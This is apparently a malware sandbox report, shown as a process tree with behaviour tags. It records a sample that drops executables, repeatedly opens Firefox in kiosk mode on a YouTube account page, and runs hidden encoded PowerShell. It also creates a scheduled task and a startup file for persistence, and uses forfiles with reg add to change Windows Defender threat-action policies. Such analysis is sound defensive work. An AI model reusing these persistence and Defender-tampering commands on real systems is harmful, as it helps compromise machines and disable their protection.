                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.3.1994297103\1149274108" -childID 2 -isForBrowser -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 21787 -prefMapSize 233444 -jsInitHandle 628 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb90e248-4db2-4dec-9194-7a708062c81b} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 2380 18d78058 tab
                                                  7⤵
                                                    PID:1388
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.4.1851694759\97835651" -childID 3 -isForBrowser -prefsHandle 3340 -prefMapHandle 3336 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 628 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45875527-832f-4573-8cb7-a7d3b4e779e6} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 3352 1d2cb958 tab
                                                    7⤵
                                                      PID:3384
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.5.45868118\652710655" -childID 4 -isForBrowser -prefsHandle 4168 -prefMapHandle 4160 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 628 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac206cd4-a607-4f87-a12e-b47dee17c9bf} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 4192 188bdb58 tab
                                                      7⤵
                                                        PID:3700
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.6.335341497\405675557" -childID 5 -isForBrowser -prefsHandle 4180 -prefMapHandle 4176 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 628 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {529318d4-bdcb-4430-992a-2db9ba933bfe} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 4212 1b3d5758 tab
                                                        7⤵
                                                          PID:3716
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.7.1117532958\487084989" -childID 6 -isForBrowser -prefsHandle 4392 -prefMapHandle 4168 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 628 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf17ea13-d24c-4b71-86bb-ca5c5ece94fd} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 4408 1d2ca458 tab
                                                          7⤵
                                                            PID:3748
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                        5⤵
                                                          PID:1556
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:1784
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                          5⤵
                                                            PID:684
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                              6⤵
                                                                PID:1140
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                              5⤵
                                                              • Checks processor information in registry
                                                              • Modifies registry class
                                                              PID:2312
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2312.0.183438356\459168554" -parentBuildID 20221007134813 -prefsHandle 1200 -prefMapHandle 1180 -prefsLen 21788 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cf6d5b8-ced7-4962-955d-280755cfd9d9} 2312 "\\.\pipe\gecko-crash-server-pipe.2312" 1312 136f8e58 gpu
                                                                6⤵
                                                                  PID:2288
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2312.1.158729855\1827860098" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 22649 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {12cdf9b4-9835-4821-a5e9-bf5cc1a25e36} 2312 "\\.\pipe\gecko-crash-server-pipe.2312" 1492 e72558 socket
                                                                  6⤵
                                                                    PID:3372
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2312.2.1714814323\5158315" -childID 1 -isForBrowser -prefsHandle 1088 -prefMapHandle 1084 -prefsLen 22752 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {219a8023-afce-48d2-992b-c777662d729c} 2312 "\\.\pipe\gecko-crash-server-pipe.2312" 1908 1a241658 tab
                                                                    6⤵
                                                                      PID:2332
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2312.3.634360622\1060488591" -childID 2 -isForBrowser -prefsHandle 2676 -prefMapHandle 2672 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9606372f-5614-4ab6-9ffd-e76a0f915558} 2312 "\\.\pipe\gecko-crash-server-pipe.2312" 2688 e62858 tab
                                                                      6⤵
                                                                        PID:2416
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2312.4.1290854755\1419756246" -childID 3 -isForBrowser -prefsHandle 3548 -prefMapHandle 3544 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f18f97-6c8b-4111-8e68-235644482e29} 2312 "\\.\pipe\gecko-crash-server-pipe.2312" 3564 1fadc558 tab
                                                                        6⤵
                                                                          PID:2676
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2312.5.94277124\2009147938" -childID 4 -isForBrowser -prefsHandle 3668 -prefMapHandle 3672 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f110e24-6297-49ff-ac48-5c4cdba1ffb2} 2312 "\\.\pipe\gecko-crash-server-pipe.2312" 3660 1fadb058 tab
                                                                          6⤵
                                                                            PID:272
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2312.6.1838683545\1706224360" -childID 5 -isForBrowser -prefsHandle 3836 -prefMapHandle 3840 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6aaf8515-1bf2-48a8-a3eb-a299723e4670} 2312 "\\.\pipe\gecko-crash-server-pipe.2312" 3824 1fadb658 tab
                                                                            6⤵
                                                                              PID:4088
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                            5⤵
                                                                              PID:1844
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                              5⤵
                                                                              • Checks processor information in registry
                                                                              PID:3268
                                                                          • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:3564
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                        2⤵
                                                                          PID:2720
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:828
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                          2⤵
                                                                          • Drops startup file
                                                                          PID:1908
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                          2⤵
                                                                            PID:1672
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                              3⤵
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:3708
                                                                        • C:\Windows\system32\taskeng.exe
                                                                          taskeng.exe {DE483F3B-22EA-4E7C-AFCF-3BBFF35E3C78} S-1-5-21-457978338-2990298471-2379561640-1000:WOUOSVRD\Admin:Interactive:[1]
                                                                          1⤵
                                                                            PID:2228
                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:636
                                                                            • C:\ProgramData\explorer.exe
                                                                              C:\ProgramData\explorer.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3992
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                              2⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3316
                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                3⤵
                                                                                  PID:1544
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                2⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Drops file in System32 directory
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3992
                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                  3⤵
                                                                                    PID:1908
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                  2⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2356
                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                    3⤵
                                                                                      PID:3660
                                                                                  • C:\ProgramData\explorer.exe
                                                                                    C:\ProgramData\explorer.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:2648
                                                                                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:3856
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                    2⤵
                                                                                    • Checks processor information in registry
                                                                                    • Modifies registry class
                                                                                    PID:1940
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.0.502870573\1266942821" -parentBuildID 20221007134813 -prefsHandle 1188 -prefMapHandle 1168 -prefsLen 21972 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63feb659-a349-42f4-a59e-6de0163c9d6e} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 1300 11cf4758 gpu
                                                                                      3⤵
                                                                                        PID:296
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.1.1303341182\1887772380" -parentBuildID 20221007134813 -prefsHandle 1456 -prefMapHandle 1452 -prefsLen 22053 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bef9c312-d016-4bd2-86d2-4fd9a583800e} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 1468 e71c58 socket
                                                                                        3⤵
                                                                                          PID:3976
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.2.676376258\1032933147" -childID 1 -isForBrowser -prefsHandle 868 -prefMapHandle 1836 -prefsLen 22156 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {705c877d-b342-48aa-8b6d-2b3b9fff55a8} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 1932 1a1e5e58 tab
                                                                                          3⤵
                                                                                            PID:3352
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.3.184480083\13125067" -childID 2 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 26505 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c58dc7dd-9f7e-4bda-8ade-4467c96e28f7} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 2672 1ce3ff58 tab
                                                                                            3⤵
                                                                                              PID:2876
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.4.1713138907\1107875031" -childID 3 -isForBrowser -prefsHandle 3284 -prefMapHandle 3288 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fd7fba3-9831-467c-902f-b02d67f9461d} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 3264 1f72a858 tab
                                                                                              3⤵
                                                                                                PID:3328
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.5.1002502929\556919754" -childID 4 -isForBrowser -prefsHandle 3212 -prefMapHandle 3460 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {614c9c53-438d-442f-a157-ad4b4416f192} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 3452 1f6f0b58 tab
                                                                                                3⤵
                                                                                                  PID:4032
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.6.8079960\107838004" -childID 5 -isForBrowser -prefsHandle 3924 -prefMapHandle 3936 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {13a3efb3-dcd5-4665-9ff3-934d40a9697b} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 3920 21c27558 tab
                                                                                                  3⤵
                                                                                                    PID:3936
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.7.260085854\1573807261" -childID 6 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66d9be6b-c26b-4aaf-8514-c7b75ca2ee94} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 4036 21cf7358 tab
                                                                                                    3⤵
                                                                                                      PID:2140
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.8.797175799\43357734" -childID 7 -isForBrowser -prefsHandle 4076 -prefMapHandle 4140 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aa08231-e1be-4271-b33d-fa3af9da61d8} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 4260 21cf6158 tab
                                                                                                      3⤵
                                                                                                        PID:2764
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.9.1485952800\1076232280" -childID 8 -isForBrowser -prefsHandle 4244 -prefMapHandle 4240 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d7f6afb-301b-4e06-9caa-e9866a805cc8} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 4252 21cf6a58 tab
                                                                                                        3⤵
                                                                                                          PID:3424
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.10.894865133\665510959" -childID 9 -isForBrowser -prefsHandle 4592 -prefMapHandle 4076 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3149ce00-52e0-43a2-88ee-55047eae06df} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 4580 21c27b58 tab
                                                                                                          3⤵
                                                                                                            PID:1188
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.11.420331386\1323983277" -childID 10 -isForBrowser -prefsHandle 4128 -prefMapHandle 4040 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb732684-2e33-4cab-9e5c-9fa20f2748a0} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 4204 19ce0e58 tab
                                                                                                            3⤵
                                                                                                              PID:1868
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.12.871048759\37299772" -childID 11 -isForBrowser -prefsHandle 4524 -prefMapHandle 4604 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 816 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b040b21d-73e9-4595-ab1c-707c5591704a} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 4072 1a1e6158 tab
                                                                                                              3⤵
                                                                                                                PID:2300
                                                                                                            • C:\ProgramData\explorer.exe
                                                                                                              C:\ProgramData\explorer.exe
                                                                                                              2⤵
                                                                                                                PID:2768
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                2⤵
                                                                                                                  PID:2640
                                                                                                                • C:\ProgramData\explorer.exe
                                                                                                                  C:\ProgramData\explorer.exe
                                                                                                                  2⤵
                                                                                                                    PID:2104
                                                                                                                  • C:\Windows\system32\wscript.EXE
                                                                                                                    C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js"
                                                                                                                    2⤵
                                                                                                                      PID:272
                                                                                                                      • C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr
                                                                                                                        "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr" "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\W"
                                                                                                                        3⤵
                                                                                                                          PID:3928
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                        2⤵
                                                                                                                          PID:3252
                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                        taskeng.exe {0C3122AE-9688-4CF8-BC2A-52AE0499E64C} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                        1⤵
                                                                                                                          PID:2772
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\AyDjQad.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\AyDjQad.exe PV /ZfFJdidfOGj 385121 /S
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:3460
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                              3⤵
                                                                                                                                PID:3964
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                  4⤵
                                                                                                                                  • Indirect Command Execution
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2104
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                    5⤵
                                                                                                                                      PID:3784
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                        6⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3228
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                    4⤵
                                                                                                                                    • Indirect Command Execution
                                                                                                                                    PID:3840
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                      5⤵
                                                                                                                                        PID:2300
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                          6⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:964
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                      4⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      PID:2268
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1504
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                          6⤵
                                                                                                                                            PID:2336
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                        4⤵
                                                                                                                                        • Indirect Command Execution
                                                                                                                                        PID:3564
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                          5⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:1664
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                            6⤵
                                                                                                                                              PID:3956
